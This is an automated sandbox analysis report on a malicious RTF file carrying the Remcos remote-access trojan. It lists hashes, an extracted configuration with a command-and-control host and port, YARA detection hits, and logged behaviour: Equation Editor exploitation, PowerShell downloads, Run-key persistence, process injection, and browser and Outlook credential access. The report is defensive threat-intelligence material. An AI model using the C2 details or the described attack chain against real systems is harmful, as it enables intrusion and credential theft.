remcos | a60f72316633a40d5ab45b035ecd03b7cd0162ce161946cfa2ad86d11fbc9c13

Analysis

max time kernel
148s
max time network
136s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
14/03/2024, 02:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a60f72316633a40d5ab45b035ecd03b7cd0162ce161946cfa2ad86d11fbc9c13.rtf
Size

71KB
MD5

65e41469da1397e3e1c9d70fc29fe2e2
SHA1

b234d40cee175effca9a503c908b408a91c7a7da
SHA256

a60f72316633a40d5ab45b035ecd03b7cd0162ce161946cfa2ad86d11fbc9c13
SHA512

22a75d17446e8b6556a1fb3fdb1f8f4671d3f894a717541c7b51861f1c87c2bdd593b998762b37b1844c9028d9cd79510a0414d87c79f679266b519f44e75c56
SSDEEP

768:W7LVB2IIi5W8rLUAvwqKfGJp8pgpyPjwf7thRrmrPNq4kZ9Y7U3gJnKxBwDwA:mj2IIWWuI4yeJp8pgoP47lmrAz3g2Bql

Score

10^/10

remcos remotehost collection persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

buike0147.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-1C7Y8W
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 23 IoCs

resource	yara_rule
behavioral1/memory/1688-149-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-146-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-145-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-144-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-143-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-142-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-151-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-154-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-155-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-156-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-158-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-160-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-159-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-162-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-161-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-164-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-166-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-167-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-196-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-211-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-213-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-214-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1688-233-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM

Detects executables built or packed with MPress PE compressor 24 IoCs

resource	yara_rule
behavioral1/memory/1592-170-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1592-177-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1592-179-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1592-180-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1592-182-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1716-185-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1716-181-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1716-188-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2584-187-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1716-189-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2584-193-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2584-191-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1716-175-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1592-173-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2584-197-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2584-195-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2584-194-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1592-202-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1688-204-0x0000000010000000-0x0000000010019000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1688-208-0x0000000010000000-0x0000000010019000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1688-207-0x0000000010000000-0x0000000010019000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1688-209-0x0000000010000000-0x0000000010019000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1716-210-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1688-212-0x0000000010000000-0x0000000010019000-memory.dmp	INDICATOR_EXE_Packed_MPress

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 3 IoCs

resource	yara_rule
behavioral1/memory/1716-188-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
behavioral1/memory/1716-189-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
behavioral1/memory/1716-210-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store

Detects executables referencing many email and collaboration clients. Observed in information stealers 3 IoCs

resource	yara_rule
behavioral1/memory/1716-188-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
behavioral1/memory/1716-189-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
behavioral1/memory/1716-210-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/1716-188-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/1716-189-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/1716-210-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/1592-180-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/1592-182-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/1592-202-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 9 IoCs

resource	yara_rule
behavioral1/memory/1592-180-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1592-182-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1716-188-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1716-189-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2584-197-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2584-195-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2584-194-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1592-202-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1716-210-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 7 IoCs

flow	pid	Process
3	2112	EQNEDT32.EXE
7	2656	WScript.exe
9	2656	WScript.exe
11	1584	powershell.exe
13	1584	powershell.exe
15	1584	powershell.exe
16	1584	powershell.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\MACC.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1584 set thread context of 1688	1584	powershell.exe	39
PID 1688 set thread context of 1592	1688	RegAsm.exe	41
PID 1688 set thread context of 1716	1688	RegAsm.exe	42
PID 1688 set thread context of 2584	1688	RegAsm.exe	44

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2112	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
